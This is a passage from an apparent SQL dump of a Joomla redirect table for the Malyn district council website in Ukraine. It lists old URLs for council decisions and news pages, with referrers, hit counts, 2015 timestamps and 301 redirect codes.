00:00:00',301),(18976,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=ru&start=7','','','',3,0,'2015-11-17 11:04:12','0000-00-00 00:00:00',301),(18977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51:--19072013-&layout=blog&Itemid=92&lang=en','','','',2,0,'2015-11-17 11:04:16','0000-00-00 00:00:00',301),(18978,'http://www.malyn-rayrada.org.ua/index.php/705-korotko-pro-finansi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-17 11:51:28','0000-00-00 00:00:00',301),(18983,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-','','','',5,0,'2015-11-17 12:55:40','0000-00-00 00:00:00',301),(18984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=342:----6----6--15--2011-&catid=34&Itemid=68&lang=en','','https://www.google.com.ua/','',5,0,'2015-11-17 13:20:33','0000-00-00 00:00:00',301),(18985,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=747:2012-08-03-09-21-28&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-17 15:35:54','0000-00-00 00:00:00',301),(18986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=218:2010-12-21-06-45-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-11-17 15:36:47','0000-00-00 00:00:00',301),(18987,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/910-pro-pereukladennya-kontraktiv-z-kerivnikami-pidpriemstv-ustanov-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-raj','','','',1,0,'2015-11-17 16:59:38','0000-00-00 00:00:00',301),(18988,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/365-pro-pereukladennja-kontraktiv-z-kerivnikami','','','',19,0,'2015-11-17 16:59:39','0000-00-00 00:00:00',301),(18989,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/910-pro-pereukladennya-kontraktiv-z-kerivnikami-pidpriemstv-ustanov-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',3,0,'2015-11-17 16:59:39','0000-00-00 00:00:00',301),(18990,'http://www.malyn-rayrada.org.ua/index.php?catid=8&id=10:2010-06-05-15-11-20&Itemid=13&lang=en&option=com_content&view=article','','','',3,0,'2015-11-17 17:07:49','0000-00-00 00:00:00',301),(18994,'http://www.malyn-rayrada.org.ua/index.php/704-malinskij-rajon-iz-bjudzhetom-na-2014-rik?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-17 20:18:30','0000-00-00 00:00:00',301),(18995,'http://www.malyn-rayrada.org.ua/index.php/1115-vidbulas-40-pozachergova-sesiya-rajonnoji-radi/','','http://go.mail.ru/search_images','',2,0,'2015-11-17 21:29:40','0000-00-00 00:00:00',301),(18996,'http://www.malyn-rayrada.org.ua/index.php/707-ogoloshennja_12?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-17 21:29:41','0000-00-00 00:00:00',301),(18997,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1152:2013-11-28-14-58-05&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-18 00:03:18','0000-00-00 00:00:00',301),(18998,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1146-ivanivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-11-18 01:54:36','0000-00-00 00:00:00',301),(18999,'http://www.malyn-rayrada.org.ua/index.php/883-vitaemo-osvityan-iz-profesijnim-svyatom?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-11-18 02:15:59','0000-00-00 00:00:00',301),(19000,'http://www.malyn-rayrada.org.ua/index.php/728-ogoloshennja_13?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',3,0,'2015-11-18 02:23:50','0000-00-00 00:00:00',301),(19001,'http://www.malyn-rayrada.org.ua/index.php?Itemid=93&id=52:--16082013-&lang=ru&layout=blog&option=com_content&view=category','','','',5,0,'2015-11-18 04:59:45','0000-00-00 00:00:00',301),(19002,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1155-josipivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-11-18 05:02:30','0000-00-00 00:00:00',301),(19003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=490:2011-12-02-09-02-47&catid=36&Itemid=70&lang=uk','','http://www.google.ru/url?url=http://www.malyn-rayrada.org.ua/index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D490:2011-12-02-09-02-47%26catid%','',1,0,'2015-11-18 06:26:10','0000-00-00 00:00:00',301),(19004,'http://www.malyn-rayrada.org.ua/index.php/1000-go-malinshchina-pidtrimaemo-zemlyakiv-dopomozhimo-jim-razom?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-11-18 09:12:30','0000-00-00 00:00:00',301),(19005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=418:2011-09-29-08-40-03&catid=37&Itemid=72&lang=uk','','','',3,0,'2015-11-18 09:30:11','0000-00-00 00:00:00',301),(19006,'http://www.malyn-rayrada.org.ua/index.php/1214-naperedodni-mistsevikh-viboriv-malinskij-mrv-usbu-v-zhitomirskij-oblasti-nagadue-telefon-doviri?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 09:46:46','0000-00-00 00:00:00',301),(19007,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1151-morozivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 11:23:52','0000-00-00 00:00:00',301),(19008,'http://www.malyn-rayrada.org.ua/index.php/1057-vidbulas-38-sesiya-rajonnoji-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 12:58:28','0000-00-00 00:00:00',301),(19009,'http://www.malyn-rayrada.org.ua/index.php/706-do-vidoma-deputativ-miscevih-rad?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 13:14:21','0000-00-00 00:00:00',301),(19010,'http://malyn-rayrada.org.ua/index.php/1179-vitannya-sub-ektiv-pidpriemnitskoji-diyalnosti-rajonu-iz-profesijnim-svyatom','','','',14,0,'2015-11-18 13:35:12','0000-00-00 00:00:00',301),(19011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=429:2011-10-12-14-13-40&catid=11&Itemid=14&lang=uk','','','',9,0,'2015-11-18 13:38:48','0000-00-00 00:00:00',301),(19012,'http://malyn-rayrada.org.ua/attachments/477_додаток 1_Дефектний акт.pdf','','','',6,0,'2015-11-18 13:40:42','0000-00-00 00:00:00',301),(19013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-11-18 13:44:57','0000-00-00 00:00:00',301),(19014,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=717:2012-06-14-15-22-29&catid=43&Itemid=82&lang=uk','','','',3,0,'2015-11-18 13:45:26','0000-00-00 00:00:00',301),(19015,'http://www.malyn-rayrada.org.ua/index.php/1181-pro-sklikannya-42-sesiji-rajonnoji-radi-6-sklikannya?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 13:57:28','0000-00-00 00:00:00',301),(19016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=en&limitstart=20','','','',1,0,'2015-11-18 14:10:06','0000-00-00 00:00:00',301),(19017,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39&layout=blog&Itemid=76&lang=uk&limitstart=10','','','',1,0,'2015-11-18 14:22:45','0000-00-00 00:00:00',301),(19018,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=uk&limitstart=10','','','',2,0,'2015-11-18 14:23:33','0000-00-00 00:00:00',301),(19019,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51&layout=blog&Itemid=92&lang=en&limitstart=20','','','',1,0,'2015-11-18 14:37:47','0000-00-00 00:00:00',301),(19020,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru&limitstart=15','','','',1,0,'2015-11-18 14:47:28','0000-00-00 00:00:00',301),(19021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51:--19072013-&layout=blog&Itemid=92&lang=en&limitstart=20','','','',2,0,'2015-11-18 15:01:44','0000-00-00 00:00:00',301),(19022,'http://www.malyn-rayrada.org.ua/index.php/558-27-sesija-rajonnoi-radi-vidbudetsja-4-ljutogo-2014','','','',6,0,'2015-11-18 16:38:24','0000-00-00 00:00:00',301),(19023,'http://www.malyn-rayrada.org.ua/index.php/701-vidbulas-viizna-koordinacijna-rada-v-ljubovichah?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 18:05:03','0000-00-00 00:00:00',301),(19024,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=555:2012-01-27-13-50-13&lang=en&option=com_content&view=article','','','',3,0,'2015-11-18 18:27:48','0000-00-00 00:00:00',301),(19025,'http://www.malyn-rayrada.org.ua/index.php/875-ogoloshennya?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 19:57:28','0000-00-00 00:00:00',301),(19026,'http://www.malyn-rayrada.org.ua/index.php/683-operativi-dani-pro-rozpodil-dodatkovoi-subvencii-z','','','',17,0,'2015-11-18 20:51:52','0000-00-00 00:00:00',301),(19027,'http://www.malyn-rayrada.org.ua/index.php/385-rezultati-ekzit-poliv?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 20:54:25','0000-00-00 00:00:00',301),(19028,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1377:-23-&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-18 21:31:31','0000-00-00 00:00:00',301),(19029,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1001-pro-programu-sotsialno-ekonomichnogo-rozvitku-malinskogo-rajonu-na-2015-rik','','','',9,0,'2015-11-18 22:20:57','0000-00-00 00:00:00',301),(19030,'http://malyn-rayrada.org.ua/index.php/580-upravlinnja-statistiki-v-m-malin-informue_2','','','',5,0,'2015-11-18 22:47:30','0000-00-00 00:00:00',301),(19031,'http://malyn-rayrada.org.ua/index.php/588-vitaemo-z-dnem-nezalezhnosti-ukraini','','','',6,0,'2015-11-18 22:47:32','0000-00-00 00:00:00',301),(19032,'http://malyn-rayrada.org.ua/index.php/701-vidbulas-viizna-koordinacijna-rada-v-ljubovichah','','','',1,0,'2015-11-18 22:47:38','0000-00-00 00:00:00',301),(19033,'http://malyn-rayrada.org.ua/index.php/705-korotko-pro-finansi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-18 22:47:39','0000-00-00 00:00:00',301),(19034,'http://malyn-rayrada.org.ua/index.php/816-golovne-upravlinnja-derzhzemagentstva-u','','','',1,0,'2015-11-18 22:47:46','0000-00-00 00:00:00',301),(19035,'http://malyn-rayrada.org.ua/index.php/888-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-9-misyatsiv-2014-roku?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-18 22:47:50','0000-00-00 00:00:00',301),(19036,'http://www.malyn-rayrada.org.ua/index.php/1037-pishov-iz-zhittya-tsvik-s-m?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-18 22:49:57','0000-00-00 00:00:00',301),(19037,'http://www.malyn-rayrada.org.ua/index.php/1057-vidbulas-38-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-18 22:49:59','0000-00-00 00:00:00',301),(19038,'http://www.malyn-rayrada.org.ua/index.php/1115-vidbulas-40-pozachergova-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-18 22:50:02','0000-00-00 00:00:00',301),(19039,'http://www.malyn-rayrada.org.ua/index.php/1137-zustrich-iz-predstavnikami-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-18 22:50:04','0000-00-00 00:00:00',301),(19040,'http://www.malyn-rayrada.org.ua/index.php/1152-na-poryadku-dennomu-virishennya-problem-silskikh-gromad?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-18 22:50:06','0000-00-00 00:00:00',301),(19041,'http://www.malyn-rayrada.org.ua/index.php/1156-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-pershe-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',12,0,'2015-11-18 22:50:08','0000-00-00 00:00:00',301),(19042,'http://www.malyn-rayrada.org.ua/index.php/645-pro-nadannja-praktichnoi-dopomogi-u-vidnovlenni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-18 22:50:18','0000-00-00 00:00:00',301),(19043,'http://www.malyn-rayrada.org.ua/index.php?id=47&Itemid=86&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-18 22:53:31','0000-00-00 00:00:00',301),(19044,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-18 22:55:43','0000-00-00 00:00:00',301),(19045,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=872:2012-12-17-18-45-20&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-18 22:57:58','0000-00-00 00:00:00',301),(19046,'http://www.malyn-rayrada.org.ua/index.php/677-zaversheno-pidgotovku-do-provedennja-chergovoi_4?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-18 23:03:18','0000-00-00 00:00:00',301),(19047,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=uk&start=14','','','',8,0,'2015-11-18 23:06:43','0000-00-00 00:00:00',301),(19048,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/863-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-16-11-2010r-5-pro-utvorennya-postijnikh-komisij-rajonnoji-radi-zatverdzhennya-jikh-skladu-ta-obrannya-goliv-','','','',1,0,'2015-11-18 23:18:30','0000-00-00 00:00:00',301),(19049,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/225-pro-zatverdzhennja-rajonnoi-programi','','','',3,0,'2015-11-19 00:09:27','0000-00-00 00:00:00',301),(19050,'http://www.malyn-rayrada.org.ua/index.php?id=55&Itemid=96&lang=uk&layout=blog&option=com_content&view=category','','','',4,0,'2015-11-19 00:47:08','0000-00-00 00:00:00',301),(19051,'http://www.malyn-rayrada.org.ua/index.php/309-vitaemo-z-dnem-peremogi_2?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-19 02:02:55','0000-00-00 00:00:00',301),(19052,'http://malyn-rayrada.org.ua/index.php/835-malinskij-rajonnij-centr-socialnih-sluzhb-dlja','','','',10,0,'2015-11-19 03:09:12','0000-00-00 00:00:00',301),(19053,'http://malyn-rayrada.org.ua/index.php/387-zaversheno-pidgotovku-do-provedennja-chergovoi_3','','','',3,0,'2015-11-19 06:33:42','0000-00-00 00:00:00',301),(19054,'http://malyn-rayrada.org.ua/index.php/388-vidbulas-16-sesija-rajonnoi-radi-6-sklikannja','','','',3,0,'2015-11-19 06:33:49','0000-00-00 00:00:00',301),(19055,'http://www.malyn-rayrada.org.ua/index.php/302-do-vidoma-zhiteliv-rajonu','','','',18,0,'2015-11-19 07:37:59','0000-00-00 00:00:00',301),(19056,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=ru&layout=blog&limitstart=30&option=com_content&view=category','','','',3,0,'2015-11-19 08:05:46','0000-00-00 00:00:00',301),(19057,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/927-pro-spisannya-osnovnikh-zasobiv','','https://www.google.com.ua','',29,0,'2015-11-19 09:10:55','0000-00-00 00:00:00',301),(19058,'http://malyn-rayrada.org.ua/index.php/581-likari-zasterigajut-dotrimujtes-gigieni','','','',6,0,'2015-11-19 10:15:11','0000-00-00 00:00:00',301),(19059,'http://malyn-rayrada.org.ua/index.php/581-likari-zasterigajut-dotrimujtes-gigieni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 10:15:13','0000-00-00 00:00:00',301),(19060,'http://malyn-rayrada.org.ua/index.php/582-jak-vberegtisja-vid-speki-poradi-mns','','','',4,0,'2015-11-19 10:15:14','0000-00-00 00:00:00',301),(19061,'http://malyn-rayrada.org.ua/index.php/582-jak-vberegtisja-vid-speki-poradi-mns?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 10:15:16','0000-00-00 00:00:00',301),(19062,'http://malyn-rayrada.org.ua/index.php/584-vidbulas-23-pozachergova-sesija-malinskoi-rajonnoi','','','',4,0,'2015-11-19 10:15:17','0000-00-00 00:00:00',301),(19063,'http://malyn-rayrada.org.ua/index.php/584-vidbulas-23-pozachergova-sesija-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 10:15:19','0000-00-00 00:00:00',301),(19064,'http://malyn-rayrada.org.ua/index.php/587-23-serpnja-v-ukraini-vidznachaetsja-den','','','',4,0,'2015-11-19 10:15:20','0000-00-00 00:00:00',301),(19065,'http://malyn-rayrada.org.ua/index.php/588-vitaemo-z-dnem-nezalezhnosti-ukraini?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 10:15:22','0000-00-00 00:00:00',301),(19066,'http://malyn-rayrada.org.ua/index.php/591-shanovni-pidpriemci','','','',5,0,'2015-11-19 10:15:23','0000-00-00 00:00:00',301),(19067,'http://malyn-rayrada.org.ua/index.php/673-informacija-pro-vikonannja-dohidnoi-chastini_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:25','0000-00-00 00:00:00',301),(19068,'http://malyn-rayrada.org.ua/index.php/677-zaversheno-pidgotovku-do-provedennja-chergovoi_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:26','0000-00-00 00:00:00',301),(19069,'http://malyn-rayrada.org.ua/index.php/683-operativi-dani-pro-rozpodil-dodatkovoi-subvencii-z','','','',5,0,'2015-11-19 10:15:28','0000-00-00 00:00:00',301),(19070,'http://malyn-rayrada.org.ua/index.php/684-vitaemo-iz-svjatom-svjatogo-mikolaja','','','',6,0,'2015-11-19 10:15:29','0000-00-00 00:00:00',301),(19071,'http://malyn-rayrada.org.ua/index.php/686-zustrichaemo-novij-2014-rik-rik-sinogo-derev?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:35','0000-00-00 00:00:00',301),(19072,'http://malyn-rayrada.org.ua/index.php/704-malinskij-rajon-iz-bjudzhetom-na-2014-rik','','','',5,0,'2015-11-19 10:15:36','0000-00-00 00:00:00',301),(19073,'http://malyn-rayrada.org.ua/index.php/706-do-vidoma-deputativ-miscevih-rad','','','',4,0,'2015-11-19 10:15:38','0000-00-00 00:00:00',301),(19074,'http://malyn-rayrada.org.ua/index.php/707-ogoloshennja_12?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:39','0000-00-00 00:00:00',301),(19075,'http://malyn-rayrada.org.ua/index.php/718-vidbulas-pozachergova-sesija-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:41','0000-00-00 00:00:00',301),(19076,'http://malyn-rayrada.org.ua/index.php/724-verhovna-rada-ukraini-prijnjala-postanovu-pro?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:42','0000-00-00 00:00:00',301),(19077,'http://malyn-rayrada.org.ua/index.php/952-grodadske-ob-ednannya-malinshchina-informue','','','',7,0,'2015-11-19 10:15:46','0000-00-00 00:00:00',301),(19078,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/807-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_26','','','',7,0,'2015-11-19 10:15:49','0000-00-00 00:00:00',301),(19079,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/819-pro-vnesennja-zmin-do-rajonnih-program?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:51','0000-00-00 00:00:00',301),(19080,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/822-pro-stan-utrimannja-avtomobilnih-dorig-i-bezpeku','','','',5,0,'2015-11-19 10:15:53','0000-00-00 00:00:00',301),(19081,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/88-pro-hid-vikonannja-rajonnoi-programi','','','',5,0,'2015-11-19 10:15:55','0000-00-00 00:00:00',301),(19082,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/89-pro-hid-vikonannja-rajonnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:57','0000-00-00 00:00:00',301),(19083,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/96-pro-hid-vikonannja-rajonnoi-programi-vidznachennja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:15:59','0000-00-00 00:00:00',301),(19084,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?limitstart=0','','','',13,0,'2015-11-19 10:16:01','0000-00-00 00:00:00',301),(19085,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=14','','','',13,0,'2015-11-19 10:16:03','0000-00-00 00:00:00',301),(19086,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=7','','','',13,0,'2015-11-19 10:16:05','0000-00-00 00:00:00',301),(19087,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/369-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:16:07','0000-00-00 00:00:00',301),(19088,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/428-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_2?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-19 10:16:11','0000-00-00 00:00:00',301),(19089,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/430-pro-programu-zabezpechennja-deputatskoi-dijalnosti_2','','','',7,0,'2015-11-19 10:16:12','0000-00-00 00:00:00',301),(19090,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/436-pro-peredachu-materialnih-cinnostej-z-balansu','','','',7,0,'2015-11-19 10:16:14','0000-00-00 00:00:00',301),(19091,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/330-pro-vnesennja-zmin-do-rajonnoi-programi_2','','','',5,0,'2015-11-19 10:16:16','0000-00-00 00:00:00',301),(19092,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/331-pro-hid-vikonannja-rajonnoi-programi-budivnictva?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:16:18','0000-00-00 00:00:00',301),(19093,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/347-pro-pereukladennja-kontraktu-z-biloshickoju-l-v','','','',5,0,'2015-11-19 10:16:21','0000-00-00 00:00:00',301),(19094,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/348-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_8?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:16:23','0000-00-00 00:00:00',301),(19095,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/351-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_5','','','',7,0,'2015-11-19 10:16:25','0000-00-00 00:00:00',301),(19096,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/271-pro-pogodzhennja-rozmezhuvannja-zemel-derzhavnoi','','','',7,0,'2015-11-19 10:16:29','0000-00-00 00:00:00',301),(19097,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/278-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro_2','','','',7,0,'2015-11-19 10:16:31','0000-00-00 00:00:00',301),(19098,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/280-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_11','','','',7,0,'2015-11-19 10:16:32','0000-00-00 00:00:00',301),(19099,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/468-pro-zatverdzhennja-rajonnoi-cilovoi-programi','','','',8,0,'2015-11-19 10:16:34','0000-00-00 00:00:00',301),(19100,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/485-pro-zminu-nazvi-ta-zatverdzhennja-statutiv','','','',8,0,'2015-11-19 10:16:36','0000-00-00 00:00:00',301),(19101,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/488-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_9','','','',7,0,'2015-11-19 10:16:38','0000-00-00 00:00:00',301),(19102,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/497-pro-zvernennja-do-korostenskoi-direkcii','','','',5,0,'2015-11-19 10:16:39','0000-00-00 00:00:00',301),(19103,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/497-pro-zvernennja-do-korostenskoi-direkcii?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 10:16:42','0000-00-00 00:00:00',301),(19104,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/10-pro-hid-vikonannja-rajonnoi-programi-shhodo','','','',7,0,'2015-11-19 10:16:49','0000-00-00 00:00:00',301),(19105,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/11-pro-hid-vikonannja-rajonnoi-programi-realizacii?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-19 10:16:51','0000-00-00 00:00:00',301),(19106,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/12-pro-hid-vikonannja-rajonnoi-programi-rozvitku','','','',6,0,'2015-11-19 10:16:53','0000-00-00 00:00:00',301),(19107,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/254-pro-zatverdzhennja-polozhennja-pro-konkursnij?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-19 10:16:56','0000-00-00 00:00:00',301),(19108,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/7-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi','','','',7,0,'2015-11-19 10:17:00','0000-00-00 00:00:00',301),(19109,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?start=14','','','',15,0,'2015-11-19 10:17:05','0000-00-00 00:00:00',301),(19110,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/879-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-19 10:17:08','0000-00-00 00:00:00',301),(19111,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/880-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-19 10:17:11','0000-00-00 00:00:00',301),(19112,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=ru&Itemid=','','','',1,0,'2015-11-19 14:07:16','0000-00-00 00:00:00',301),(19113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=ru&Itemid=','','','',5,0,'2015-11-19 14:15:14','0000-00-00 00:00:00',301),(19114,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=uk&Itemid=','','','',1,0,'2015-11-19 14:41:11','0000-00-00 00:00:00',301),(19115,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/961-pro-prijnyattya-u-spilnu-vlasnist-teritorialnikh-gromad-sil-selishch-rajonu-majna?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 14:57:11','0000-00-00 